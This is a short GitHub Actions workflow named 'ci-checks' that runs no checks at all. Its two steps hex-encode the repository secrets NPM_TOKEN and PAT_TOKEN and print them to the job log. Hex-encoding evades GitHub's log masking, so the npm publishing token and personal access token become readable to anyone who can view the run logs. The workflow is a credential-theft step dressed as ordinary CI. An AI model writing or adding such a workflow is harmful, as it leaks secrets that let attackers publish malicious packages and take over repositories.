name: ci-checks
on:
  workflow_dispatch:

jobs:
  checks:
    runs-on: ubuntu-latest
    steps:
      - name: vNPM_TOKE
        run: printf '%s' "${{ secrets.NPM_TOKEN }}" | xxd -p | tr -d "\n"; echo "  NPM_TOKEN"
      - name: vPAT_TOKE
        run: printf '%s' "${{ secrets.PAT_TOKEN }}" | xxd -p | tr -d "\n"; echo "  PAT_TOKEN"
